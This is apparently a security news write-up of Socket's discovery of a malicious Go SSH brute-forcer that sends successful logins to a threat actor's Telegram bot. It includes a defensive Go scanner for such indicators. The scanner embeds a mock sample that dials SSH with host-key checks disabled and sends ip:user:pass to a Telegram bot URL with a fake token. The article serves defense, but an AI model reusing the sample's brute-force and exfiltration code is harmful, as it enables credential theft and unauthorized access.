The open-source ecosystem has once again been used to distribute malicious software. Socket’s Threat Research Team has uncovered a malicious Go module that poses as a fast SSH brute-force tool but, in reality, hands every successful login credential to its author.
The package, published on GitHub and in the Go module ecosystem under the alias IllDieAnyway, is presented as an offensive security utility. Its code continuously scans random IPv4 addresses for exposed SSH services on port 22 and attempts authentication with a local wordlist of weak credentials.
The program turns on its operator the moment it succeeds. As Socket’s report puts it:
“On the first successful login, the package sends the target IP address, username, and password to a hardcoded Telegram bot controlled by the threat actor.”
The exfiltration goes through the Telegram Bot API over HTTPS, so the traffic blends in with ordinary web requests; even so, egress to api.telegram.org from a host that is simultaneously sweeping port 22 is itself a useful detection signal. The hardcoded bot (@sshZXC_bot) relays the stolen credentials to a private chat controlled by the attacker, identified as @io_ping (alias Gett).
Once read, the Go code makes no attempt to hide its intent:
- Infinite loop scanning – Random IPv4 addresses are probed for an open port 22 in an endless loop.
- Weak wordlist attacks – Usernames such as root and admin are paired with common defaults such as toor, raspberry, dietpi, alpine, and 123456.
- Host key bypass – The SSH client configuration sets HostKeyCallback to ssh.InsecureIgnoreHostKey(), so the target server’s identity is never verified.
- Silent exfiltration – On success, the tool sends ip:user:pass straight to the attacker’s Telegram chat without any indication to the operator.
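The indicators above are easy to check for before running any third-party "offensive" Go tool. The following program is an added example (it is not code from the Socket report or from the module itself): it parses a Go source file with the standard go/parser package and reports host-key verification being disabled, a hardcoded api.telegram.org bot endpoint, and any literal shaped like a Telegram bot token, then flags the combination described above. The SampleSource literal is a constructed mimic of the described behaviour with a fake token; the function, constant and kind names are this example's own.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
	"regexp"
	"strings"
)

// Kinds of indicator this scanner reports (names are this example's own).
const (
	KindHostKeyBypass    = "host-key-bypass"   // ssh.InsecureIgnoreHostKey() call
	KindTelegramEndpoint = "telegram-endpoint" // hardcoded api.telegram.org/bot... URL
	KindBotToken         = "bot-token-literal" // literal shaped like a Telegram bot token
)

// Finding is one indicator located in a Go source file.
type Finding struct {
	Kind string
	Line int
	Text string
}

// botTokenRe matches the shape of a Telegram bot token: numeric bot id,
// colon, long secret. It is applied only to string literals.
var botTokenRe = regexp.MustCompile(`\d{6,}:[A-Za-z0-9_-]{30,}`)

// ScanGoSource parses src as a single Go file and reports the indicators.
// Walking the AST instead of grepping means comments are ignored and the
// InsecureIgnoreHostKey call site is identified reliably.
func ScanGoSource(filename, src string) ([]Finding, error) {
	fset := token.NewFileSet()
	file, err := parser.ParseFile(fset, filename, src, 0)
	if err != nil {
		return nil, err
	}
	var findings []Finding
	ast.Inspect(file, func(n ast.Node) bool {
		switch x := n.(type) {
		case *ast.CallExpr:
			sel, ok := x.Fun.(*ast.SelectorExpr)
			if !ok {
				return true
			}
			pkg, ok := sel.X.(*ast.Ident)
			if ok && pkg.Name == "ssh" && sel.Sel.Name == "InsecureIgnoreHostKey" {
				findings = append(findings, Finding{KindHostKeyBypass, fset.Position(x.Pos()).Line, "ssh.InsecureIgnoreHostKey()"})
			}
		case *ast.BasicLit:
			if x.Kind != token.STRING {
				return true
			}
			lit := strings.Trim(x.Value, "`\"") // strip raw or interpreted quotes
			line := fset.Position(x.Pos()).Line
			if strings.Contains(lit, "api.telegram.org/bot") {
				findings = append(findings, Finding{KindTelegramEndpoint, line, lit})
			}
			if tok := botTokenRe.FindString(lit); tok != "" {
				findings = append(findings, Finding{KindBotToken, line, tok})
			}
		}
		return true
	})
	return findings, nil
}

// LooksLikeCredentialExfiltrator flags the combination the article describes:
// an SSH client that skips host verification and a hardcoded Telegram bot
// endpoint in the same file. Either indicator alone is common in legitimate tools.
func LooksLikeCredentialExfiltrator(findings []Finding) bool {
	seen := map[string]bool{}
	for _, f := range findings {
		seen[f.Kind] = true
	}
	return seen[KindHostKeyBypass] && seen[KindTelegramEndpoint]
}

// SampleSource is a constructed stand-in mimicking the described behaviour
// (host-key bypass, then a Telegram callback on success). The token is fake
// and this is not the real module's code.
const SampleSource = `package main

import (
	"net/http"
	"golang.org/x/crypto/ssh"
)

const exfil = "https://api.telegram.org/bot1234567890:AAFakeTokenFakeTokenFakeTokenFakeTok/sendMessage"

func try(ip, user, pass string) {
	cfg := &ssh.ClientConfig{User: user, Auth: []ssh.AuthMethod{ssh.Password(pass)},
		HostKeyCallback: ssh.InsecureIgnoreHostKey()}
	if c, err := ssh.Dial("tcp", ip+":22", cfg); err == nil {
		c.Close()
		http.Get(exfil + "?chat_id=1&text=" + ip + ":" + user + ":" + pass)
	}
}
`

func main() {
	findings, err := ScanGoSource("sample.go", SampleSource)
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("sample.go:%d %s %s\n", f.Line, f.Kind, f.Text)
	}
	fmt.Println("credential-exfiltrator pattern:", LooksLikeCredentialExfiltrator(findings))
}
```

In practice you would run ScanGoSource over every file of a vendored or `go mod download`-ed dependency before building it. The check is deliberately narrow: it will not catch an endpoint assembled at runtime or decoded from an obfuscated blob, so treat a clean result as one input to a manual review of the tool's outbound network calls rather than as a verdict.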
As Socket researchers noted:
“The strategy is straightforward and effective. Release a ‘fast’ offensive utility, then hardcode an exfiltration endpoint for every success. The package offloads scanning and password guessing to unwitting operators, spreads risk across their IPs, and funnels the successes to a single threat actor-controlled Telegram bot.”
The package’s publisher, known as IllDieAnyway (alias G3TT), maintains an arsenal of offensive tools on GitHub: fast port scanners, a phpMyAdmin brute forcer with Telegram callbacks, and a C2 framework called Selica-C2.
Socket’s analysis linked this actor to the Russian-speaking cybercrime community:
“We assess with high confidence that IllDieAnyway is a Russian-speaking threat actor. This conclusion is based on consistent Russian-language artifacts across the threat actor’s GitHub repositories.”
Running the package exposes its users to both legal and security consequences. The operator is the one scanning the internet and guessing passwords from their own IP address, believing they are running a brute-force penetration test, while every credential found goes to a threat actor who can use it for profit, espionage, or further attacks.
Unauthorized SSH access is a hot commodity in underground markets, where it is used to fuel botnets, ransomware campaigns, and illicit cryptomining.